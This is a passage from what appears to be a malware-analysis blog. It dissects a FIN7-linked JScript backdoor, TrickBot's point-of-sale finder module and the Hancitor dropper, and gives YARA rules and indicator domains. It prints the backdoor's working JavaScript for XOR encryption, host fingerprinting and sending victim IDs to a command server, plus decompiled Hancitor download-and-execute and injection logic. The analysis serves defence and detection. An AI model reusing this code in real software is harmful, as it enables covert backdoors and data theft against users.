        encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split("");
    }
    var output = [];
    for (var i = 0; i < request.length; i++) {
        var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
        output.push(String.fromCharCode(charCode));
    }
    var result_string = output.join("");
    if (type === "encrypt") {
        result_string = result_string + ")*(" + encryption_key.join("");
        result_string = encodeURIComponent(result_string);
    }
    return result_string;
}

a. If type parameter equals “decrypt”, the request is processed via decodeURIComponent splitting the request with separator “)*(” and then retrieving encryption_key (second element[1]) from split request, if no encryption_key split it pulls it as a random value via (Math.floor(Math.random() * 9000) + 1000).toString().split(“”);.
The decoding routine is a simple XOR loop decoding the content as follows joining the result_string via .join command.

var output = [];
    for (var i = 0; i < request.length; i++) {
        var charCode = request.charCodeAt(i) ^ \
encryption_key[i % encryption_key.length].charCodeAt(0);
        output.push(String.fromCharCode(charCode));
    }

b. If type parameter equals “encrypt”, the result_string is joined with “)*(” and passed encodeURIComponent.
C. “id”

The ID function executes a simple WMI query as follows retrieving and parsing for MAC address and DNS domain:

"select * from Win32_NetworkAdapterConfiguration where ipenabled = true"

///////////////////////////////
// JS Backdroor "id" Function //
///////////////////////////////
function id() {
    var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration \ 
where ipenabled = true");
    var lItems = new Enumerator(lrequest);
    for (; !lItems.atEnd(); lItems.moveNext()) {
        var mac = lItems.item().macaddress;
        var dns_hostname = lItems.item().DNSHostName;
        if (typeof mac === "string" && mac.length > 1) {
            if (typeof dns_hostname !== "string" && dns_hostname.length < 1) {
                dns_hostname = "Unknown";
            } else {
                for (var i = 0; i < dns_hostname.length; i++) {
                    if (dns_hostname.charAt(i) > "z") {
                        dns_hostname = dns_hostname.substr(0, i) + "_" + \
 dns_hostname.substr(i + 1);
                    }
                }
            }
            return mac + "_" + dns_hostname;
        }
    }
}

Finally, the value is concatenated in the format of mac + “_” + dns_hostname.
D. “get_path”

The function takes no parameters and generates a request to the server with the path that consists with the random path from “pathes” array and the random file from files as follows:

//////////////////////////////////////
// JS Backdroor "get_path" Function //
//////////////////////////////////////
function get_path() {
    var pathes = ["images", "image", "content", "fetch", "cdn"];
    var files = ["create_logo", "get_image", "create_image", \
 "show_ico", "show_png", "show_jpg"];
    var path = pathes[Math.floor(Math.random() * pathes.length)] + "/" \
+ files[Math.floor(Math.random() * files.length)];
    return "hxxps://bing-cdn[.]com/" + path;
}

For example,

hxxps://bing-cdn[.]com/fetch/show_jpg?request=page
hxxps://bing-cdn[.]com/images/get_image?request=page
hxxps://bing-cdn[.]com/image/show_ico?request=page

E. “send_data”

The function accepts 3 parameters such as type, data, and boolean parameter crypt.

//////////////////////////////////////
// JS Backdroor "send_data" Function //
//////////////////////////////////////
function send_data(type, data, crypt) {
    try {
        var http_object = new ActiveXObject("MSXML2.ServerXMLHTTP");
        if (type === "request") {
            http_object.open("POST", get_path() + "?request=page", false);
            data = "ytqikulpemsi=" + \
crypt_controller("encrypt", "group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=" \
+ uniq_id + "&id=" + id() + "&" + data);
        } else {
            http_object.open("POST", get_path() + "?request=content&id=" + uniq_id, false);
            if (crypt) {
                data = crypt_controller("encrypt", data);
            }
        }
        http_object.setRequestHeader("User-Agent", \
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
        http_object.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        http_object.setOption(2, 13056);
        http_object.send(data);
        return http_object.responseText;
    } catch (e) {
        return "no";
    }

a. if type === “request”, the backdoor forms the POST request as with get_path ending with “?request=page.” The data consists of the hardcoded value “ytqikulpemsi=” with crypt_controller function with parameters “encrypt” and the following URI “group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=” with the “uniq_id” + “&id=” + the ID return function + “&” + data);

http_object.open(“POST”, get_path() + “?request=content&id=” + uniq_id, false);

This function is used with the main with the parameter “action=get_command”

ytqikulpemsi=group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=….&id=…

An example of the decoded full path is as follows:

group=work2&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=208\
&id=00:0C:29:B4:CE:DC_WIN_NAME&action=get_command

An example of the encoded data (four-digit XOR encryption key):

ytqikulpemsi=TB_BC%0DUOPXQYTU%16EG%0D%11%40USEVD%0DQTXUSU%04%03S%40cvA%5E%03%11GY%5DR%0E\
%01%05%07%03%11FYT%0A%07%07%08%11ZT%0D%07%03%0At%09%02%09%0Dq%04%0Atv%0Attlgyy%1Eqr%07%\
05%03%09xe%04%09e%15QSCZ_%5E%0ATUDhP_%5DZR%5ET)*(3007

IV. Yara Signature:

rule apt_win32_possible_fin7_doc {
   meta:
      description = "Detects possible FIN7 first-stage initial doc"
      author = "@VK_Intel"
      date = "2018-11-23"
      hash1 = "f5f8ab9863dc12d04731b1932fc3609742de68252c706952f31894fc21746bb8"
      hash2 = "6e1230088a34678726102353c622445e1f8b8b8c9ce1f025d11bfffd5017ca82"
   strings:
      $font = "{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil MS Sans S" fullword wide
      $userform = "Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1 " fullword ascii
      $uniq_string = "C:\\Program Files\\Microsoft Office\\Office14\\MSWORD.OLB" fullword ascii


      $x0 = "C:\\Users\\Administrator\\Downloads\\InkEd.dll" fullword ascii
      $x1 = "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\Word8.0\\INKEDLib.exd" fullword ascii
      $x2 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" fullword ascii
   condition:
       uint16(0) == 0xcfd0 and
        filesize < 2000KB and ( 1 of ($x*) and $font and ( $uniq_string or $userform ) )
       or ( all of them )
}

IV. Indicators of Compromise: Domains

hxxps://googleapi-cdn[.]com
hxxps://bing-cdn[.]com

hxxps://cisco-cdn[.]com/

Let’s Learn: Introducing Latest TrickBot Point-of-Sale Finder Module

Goal: Analyze the latest TrickBot point-of-sale finder“psfin32” reconnaissance module hunting for point of sale related services, software, and machines in Lightweight Directory Access Protocol (LDAP)
Source:
Unpacked TrickBot psfin32 Module 32-Bit (x86) (MD5: 4fce2da754c9a1ac06ad11a46d215d23)
Outline

I. Background
II. Decoded TrickBot Point-of-Sale Finder “psfin32” Module 32-Bit (x86) 
III. TrickBot Point-of-Sale Finder Module vs DomainGrabber Module: Code Analysis
IV.  TrickBot Point-of-Sale Finder Module LDAP Analysis
V.  TrickBot Point-of-Sale Finder Module POST Command
IV. Yara Signature

I. Background
This is not the first time the TrickBot development group leverages LDAP; they also developed a DomainGrabber module specifically to harvest sensitive domain controller information, as detailed earlier. The group behind the TrickBot malware development remains to be one of the most resourceful in the e-crime ecosystem continuously releasing various modules (for example. password grabber “pwgrab32Dll” on October 19, 2018). The module itself does not steal any point-of-sale data but rather used to profile corporate machines of interest with possible point-of-sale devices. This module arrives just in time for the holiday shopping season highlighting the group interest in exploring possible point-of-sale breaches. The question is: What point-of-sale malware would the group behind TrickBot deploy on identified machines of interest, and/or would they auction this access to another group? This question is yet to be answered.
II. Decoded TrickBot Point-of-Sale Finder “psfin32” Module 32-Bit (x86)

This tiny “psfin32” module DLL with the size of 18.13 KB (18568 bytes), compiled on Monday, November 5, 09:00:47 2018 UTC, is originally called “dll[.]dll.” The module itself consists of only 24 functions.
The decoded Trickbot “pfin32Dll” module contains the usual Trickbot export functions:

Control
FreeBuffer
Release
Start

III. TrickBot Point-of-Sale Finder Module vs DomainGrabber Module: Code Analysis

The latest module consists visually a lot of similarity to their previous DomainGrabber module. During pseudo source-code level analysis, it is revealed that the code contains 6 partial function matches (including perfect match and strongly connected components), 17 unreliable function matches (including same MD index and constants, strongly connected components, similar small pseudo-code, strongly connected components small-primes-product, and loop count). By and large, the pseudo source-code analysis reveals the new module heavily borrows from the earlier DomainGrabber code and was likely coded by the same developer(s).
IV. TrickBot Point-of-Sale Finder Module LDAP Analysis
This Trickbot module was programmed leveraging Active Directory Service Interfaces (ADSI) APIs to search LDAP for objects possibly linked to point of sale related services, software, and machines. To learn more about specific access ADsOpenObject and IADsContainer interface, please refer to the DomainGrabber post.
LDAP provider is used to access Active Directory Domain Services. The LDAP binding string takes the following form of “GC://” binding to the root of the namespace. “GC:” uses the LDAP provider to bind to the Global Catalog service to execute queries.
The module queries for DOMAIN Global Catalog the following accesses:

COMPUTERS
USERS
GROUPS
SITES
OUs

The point-of-sale key terms of interest are as follows:

*POS*
*REG*
*CASH*
*LANE*
*STORE*
*RETAIL*
*BOH*
*ALOHA*
*MICROS*
*TERM*

V. TrickBot Point-of-Sale Finder Module POST Command
Once the information is harvested, the “Log” file with the information would be posted to the TrickBot to “Dpost” servers via “/%s/%s/90” command.

Part of the export “Control” function, the module forms and communicates to the next-layer network via the module network path ending in …///90. The /90 ending is leveraged for POST requests with its content in the following three unique formats:

A. Content-Disposition: form-data; name="proclist"
B. Content-Disposition: form-data; name="sysinfo"
C. Content-Type: multipart/form-data; boundary=Arasfjasu7

The unique value “Arasfjasu7” appears to be a marker/separator for the LDAP query collection upload to split the harvested information.
IV. Yara Signature

import "pe"

rule crime_win32_trickbot_psfin32_dll {
   meta:
      author = "@VK_Intel"
      reference = "Detects TrickBot Point-of-Sale Finder Module"
      date = "2018-11-07"
      hash1 = "f82d0b87a38792e4572b15fab574c7bf95491bf7c073124530f05cc704c1ee96"
   strings:
      $s0 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" fullword wide
      $s1 = "Dpost servers unavailable" fullword ascii
      $s2 = "USERS:" fullword wide
      $s3 = "*POS*" fullword wide
      $s4 = "/%s/%s/90" fullword wide
      $s5 = "DOMAIN GC" fullword wide
      $s6 = "*MICROS*" fullword wide
      $s7 = "(&(objectCategory=person)(sAMAccountName=%s))" fullword wide

 $ldap_gc_pos_queryportion = { 85 f6 0f ?? ?? ?? ?? ?? 8b ?? ?? 8d ?? ?? ?? ?? ?? 6a 04 c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b ?? 52 50 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 68 84 45 00 10 57 e8 ?? ?? ?? ?? 68 a0 45 00 10 57 e8 ?? ?? ?? ?? 68 24 46 00 10 57 e8 ?? ?? ?? ?? ba 40 46 00 10 b9 e0 44 00 10 e8 ?? ?? ?? ?? 50 68 4c 46 00 10 57 e8 ?? ?? ?? ??}

   condition:
      ( uint16(0) == 0x5a4d and
         filesize < 50KB and
         pe.imphash() == "13c48c2a1eaa564e28ee00ed7cd0fc0f" and pe.exports("Control") and pe.exports("Release") and
         ( all of them )
      ) or ( $ldap_gc_pos_queryportion and 5 of ($s*) )
}

Let’s Learn: In-Depth Reversing of Hancitor Dropper/Loader: 2016 vs 2018 Malware Progression

Goal: Analyze the latest Hancitor variant (build “25xce10″) to determine dropper and downloader malware progression in time from 2016 to the latest version in 2018.
Source:
Original Packed Hancitor Loader 32-Bit (x86) (MD5: 0cabdc2d4b83cd8b210fd2bd15d54bdc)
Unpacked Hancitor Dropper & Loader 32-Bit (x86) (MD5: fc7748f302a1566c27568e094873817a)

Outline

I. Background
II. Original Packed Hancitor Loader 32-Bit (x86)
III. Unpacked Hancitor Dropper & Loader 32-Bit (x86)
A. Hancitor MainThreadProcessor
B. Hancitor SystemInfo Generation
C. Hancitor RC4 CryptDecrypt Routine
IV. Yara Signature

I. Background
The group behind Hancitor distribution campaigns remains to be one of the more resourceful and sophisticated cybercrime loader-as-a-service group delivering various payloads – ranging from simple credential stealer malware to point-of-sale and banking malware variants (from Pony Stealer, EvilPony Stealer, AZORult Stealer to Neverquest Banker, Panda Banker, Gozi ISFB Banker, and Danabot Banker).
One of the most interesting malware analysis revolves around source code-level analysis malware development progression in time. I highly recommend reading this article on Hancitor titled “A Closer Look At Hancitor” written by Nick Hoffman and Jeremy Humble. I will utilize the malware sample from this article to compare against one of the latest Hancitor variants (h/t to @malware_traffic for the latest sample). Additionally, I recommend reading @benkow_’s blog titled “Hancitor Panel Overview” to learn more about the Hancitor panel.
II. Original Packed Hancitor Loader 32-Bit (x86)

The Hancitor malspam email chain included the first-stage loader as a malicious Microsoft Word document requiring a victim to enable macros to view the fax message as if it is from a legitimate company HelloFax.

III. Unpacked Hancitor Dropper & Loader 32-Bit (x86)

By and large, while the group behind the malware is rather experienced and persistent, the Hancitor dropper remains to be a simple and unsophisticated dropper and loader type of malware that comes with little development from 2016. Some of the notable lack of development and adjustment includes its reliance on ANSI API calls as well as unsophisticated WriteProcessMemeory injection method, modified %TEMP% run method with joined function on CreateProcessA rather than as a separate function, absence of Winhost32.exe check logic and its derivative functions, additional error check on CreateProcessA and exception handling, improved parser function before WriteProcessMemory injection, joined injection function, no deletion logic, different initial and entry function.
The reviewed 2016 Hancitor dropper version contains 66 functions with the size of 20.00 KB (20480 bytes), while the latest 2018 Hancitor version consists of 51 functions with the size of 20.50 KB (20992 bytes). During pseudo source-code level analysis, it is revealed that the code contains 8 partial function matches (including perfect match, same MD index and constants, strongly connected components, and similar small pseudo-code), 34 unreliable function matches (including perfect match, same MD index and constants, strongly connected components, similar small pseudo-code, strongly connected components small-primes-product, and loop count).
The notable differences include the absence of the connectivity check in the latest version. For example, the 2016 version contained tried to see if it can reach google.com as part of its logic. Moreover, the 2016 version did not contain the RC4 encryption with RtlDecompressBuffer API call to decode the next stage as opposed to the 2018 variant. The “e” command appears to be a new one relative to the 2016 version.
A. Hancitor MainThreadProcessor
In this case, I am looking into the Hancitor build “25xce10”. The Hancitor malware receives multiple commands that it leverages for parsing and executing additional steps. The commands and their execution are separated by “:”, and the URLs, for example, are separated with “|” symbol.

Hancitor has logic to parse the following commands:










Command Description
"r" Download and execute .DLL or .EXE
"l" Download and execute .EXE in separate thread (arg=1)
"e" Download and execute .EXE in separate thread (arg=0)
"b" Download and inject code into svchost.exe
"d" N/A (not implemented; used to delete itself in older version)
"c" N/A (not implemented)
"n" N/A (not implemented)

Command	Description
"r"	Download and execute .DLL or .EXE
"l"	Download and execute .EXE in separate thread (arg=1)
"e"	Download and execute .EXE in separate thread (arg=0)
"b"	Download and inject code into svchost.exe
"d"	N/A (not implemented; used to delete itself in older version)
"c"	N/A (not implemented)
"n"	N/A (not implemented)

The full pseudo-coded Hancitor main command processor function is as follows:

////////////////////////////////////////////////////////////////////////////////
//////////// Hancitor MainThreadProcessor //////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
signed int __cdecl HancitorMainCommandProcessor(int cmd, signed int *a2)
{

  if ( *(_BYTE *)(a1 + 1) == ':' )
  {
    switch ( *(_BYTE *)cmd )
    {
      case 'r': 
// "r" command -> download and execute .DLL or .EXE 
// if .DLL -> via rundll32.exe, $s,f1 in %TEMP% or if .EXE -> CreateProcessA

*a2 = RtlDecompressBuffer_GetTemp_rundll32(cmd + 2);
        return 1;
      case 'l':
// "l" command -> download and execute .EXE in separate thread (arg=1)
// check for "MZ" header, call VirtualAlloc and/or dynamic API resolution

        v3 = RtlDecompress_CreateThread(cmd + 2, 1);
        goto LABEL_5;
      case 'e':
// "e" command -> download and execute .EXE in separate thread (arg=0)
// check for "MZ" header, call VirtualAlloc and/or dynamic API resolution

        v3 = RtlDecompress_CreateThread(cmd + 2, 0);

LABEL_5:
        *a2 = v3;
        result = 1;
        break;
      case 'b':
// "b" command -> download and inject code into svchost.exe
// check for "MZ" header, call allocate memory and write code into the memory

*a2 = RtlDecompressBuffer_Call_svchost_injection(cmd + 2);
        result = 1;
        break;
      case 'n':
// "n" command -> no processor for this command

*a2 = 1;
        result = 1;
        break;
      default:
        goto LABEL_9;
    }
  }
  else
  {
LABEL_9:
    result = 0;
  }
  return result;
}

B. Hancitor SystemInfo Generation
By and large, the Hancitor malware collects generic information regarding the host that includes various information filled into the formatted collector string:

GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32|64)

The shortened pseudo-coded C++ Hancitor SystemInfo function is as follows:

////////////////////////////////////////////////////////////////////////////////
//////////// Hancitor MainThreadProcessor //////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
 signed int __cdecl SystemInfo(int a1, int a2, int a3)
{
  version_ret = GetVersion();
  bot_id = qword_1E6178;
  win_version = version_ret;
  build_bot_1 = HIDWORD(qword_1E6178);
  if ( !qword_1E6178 )
  {
    LODWORD(v7) = Adapteers_GetWindowsDirectoryA();
    build_bot_1 = HIDWORD(v7);
    bot_id = v7;
    qword_1E6178 = v7;
  }
  GetComputerNameA_0((signed int)&comp_name);
  ExternalAPI_resolution(v8, bot_id, (int)&external_ip);
  win_version_1 = (unsigned __int8)win_version;
  check_if_x64 = GetNativeSystemInfo() == 1;
  comp_name_info = pbData_1;
  if ( check_if_x64 )
  {
    if ( !pbData_1 )
    {
      pbData_1 = GetProcessHeap_0(0x2000);
      func1(pbData_1, (char *)&unk_1E4018, 0x2000);
      Crypto_func(pbData_1, 0x2000, (int)&pbData_key, 8);
      comp_name_info = pbData_1;
    }
    wsprintfA(
      &formatted_systeminfo,
      "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)",
      bot_id,
      build_bot_1,
      comp_name_info,
      &comp_name,
      &external_ip,
      win_version_1,
      HIBYTE(win_version));
  }

C. Hancitor RC4 CryptDecrypt Routine


The Hancitor dropper heavily utilizes RtlDecompressBuffer and Crypto API to decrypt its payloads. Rather than relying on custom decryption, the malware simply implements the RC4 decryption logic.

IV. Yara Signature

import "pe"

rule crime_win32_hancitor_dropper {
   meta:
      author = "@VK_Intel"
      reference = "Detects Hancitor Dropper/Loader"
      date = "2018-11-04"
      hash1 = "c61f929981c573e43dd08f0c5a047ba3a3167436b493df819461d4e7953a91ed"
   strings:
      $s1 = "Rundll32.exe %s,f1" fullword ascii
      $s2 = "explorer.exe" fullword ascii
      $s3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
      $s4 = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" fullword ascii
      $s5 = "GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)" fullword ascii
      $s6 = "http://api.ipify.org" fullword ascii
      $s7 = "Content-Type: application/x-www-form-urlencoded" fullword ascii

      $crypt_sysfunction = { 8d ?? ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 0f b6 c3 83 c4 08 c1 eb 08 89 ?? ?? 0f b6 db e8 ?? ?? ?? ?? 83 f8 01 a1 ?? ?? ?? ?? 75 ?? 85 c0 75 ?? 68 00 20 00 00 e8 ?? ?? ?? ?? 68 00 20 00 00 68 18 40 1e 00 50 a3 ?? ?? ?? ?? e8 ?? ?? ?? ?? 6a 08 68 10 40 1e 00 68 00 20 00 00 ff ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? a1 ?? ?? ?? ?? 83 c4 20}

      $external_ip_resolution = { 55 8b ec 51 80 ?? ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? 50 6a 20 68 80 61 1e 00 68 c4 31 1e 00 e8 ?? ?? ?? ?? 83 c4 10 83 f8 01 75 ?? 8b ?? ?? c6 ?? ?? ?? ?? ?? ?? 68 80 61 1e 00 ff ?? ?? ff ?? ?? ?? ?? ?? b8 01 00 00 00 8b e5 5d c3 68 dc 31 1e 00 ff ?? ?? c6 ?? ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? 33 c0 8b e5 5d c3}

      $main_cmd_processor = { 55 8b ec 8b ?? ?? 80 ?? ?? ?? 75 ?? 0f ?? ?? 83 c0 9e 83 f8 10 77 ?? 0f ?? ?? ?? ?? ?? ?? ff ?? ?? ?? ?? ?? ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 04 89 ?? b8 01 00 00 00 5d c3 6a 01 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 08 89 ?? b8 01 00 00 00 5d c3 6a 00 eb ?? 8d ?? ?? 50 e8 ?? ?? ?? ?? 8b ?? ?? 83 c4 04 89 ?? b8 01 00 00 00 5d c3 8b ?? ?? c7 ?? ?? ?? ?? ?? b8 01 00 00 00 5d c3 33 c0 5d c3}

   condition:
      ( uint16(0) == 0x5a4d and
         filesize < 60KB and
         pe.imphash() == "9ea0470ccffd0a7ac8dd70e0968d3e95" and
         ( all of them )
      or  5 of ($s*)  and ( $main_cmd_processor  ) or ( $crypt_sysfunction and $external_ip_resolution ) )
      }

	Peter Kruse on Let’s Learn: In-Depth on…
	mark Johnson on Malware Traffic Internals: Bla…
	Passion on Let’s Learn: In-Depth Re…
	Unknown on Programming Challenge in …
	Hung-Ting on Installing Cuckoo Sandbox on M…